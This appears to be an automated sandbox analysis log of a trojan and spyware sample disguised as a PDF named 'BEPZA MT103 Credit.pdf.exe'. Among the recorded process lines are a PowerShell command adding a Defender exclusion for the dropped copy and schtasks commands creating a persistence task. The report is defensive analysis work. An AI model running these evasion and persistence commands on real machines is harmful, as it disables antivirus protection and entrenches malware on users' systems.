Source: BEPZA MT103 Credit.pdf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YEGIgzyAhkvT.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/11@3/3

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe

File created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe

File created: C:\Users\user\AppData\Local\Temp\tmp3E23.tmp

Jump to behavior

Source: BEPZA MT103 Credit.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: BEPZA MT103 Credit.pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.dr	Binary or memory string: SELECT YEAR(balance_date) AS Year, MONTH(balance_date) AS Month, SUM(profit) AS TotalIncome, SUM(expense) AS TotalExpense FROM Daily_Report GROUP BY YEAR(balance_date), MONTH(balance_date) ORDER BY Year, Month;QA monthly report of profits and expenses%QueryMonthlyReport9SELECT * FROM DATABASE_USERSmINSERT INTO DATABASE_USERS VALUES(@username,@password)[SELECT * FROM DATABASE_USERS WHERE [user_id]=IUPDATE DATABASE_USERS SET password='
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.dr	Binary or memory string: SELECT CONVERT(DATE, V.VISIT_TIME) AS Visit_Date, COUNT(V.CLIENT_VISIT_ID) AS Daily_Visits FROM Client_Visits V JOIN Clients C ON V.CLIENT_ID = C.CLIENT_ID GROUP BY CONVERT(DATE, V.VISIT_TIME) ORDER BY Visit_Date;QA monthly and daily report of gym visits
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3716690730.0000000003D1D000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.dr	Binary or memory string: SELECT FORMAT(V.VISIT_TIME, 'yyyy-MM') AS Month, COUNT(V.CLIENT_VISIT_ID) AS Total_Visits FROM Client_Visits V JOIN Clients C ON V.CLIENT_ID = C.CLIENT_ID GROUP BY FORMAT(V.VISIT_TIME, 'yyyy-MM') ORDER BY Month;

Source: BEPZA MT103 Credit.pdf.exe	Virustotal: Detection: 66%
Source: BEPZA MT103 Credit.pdf.exe	ReversingLabs: Detection: 75%

Source: BEPZA MT103 Credit.pdf.exe	String found in binary or memory: -Added at (DD-MM-YYYY):
Source: BEPZA MT103 Credit.pdf.exe	String found in binary or memory: Log OutIaddUpdateDeleteRowsToolStripMenuItem-Add/Update/Delete rows/clientToolStripMenuItem

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe

File read: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"	Jump to behavior

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
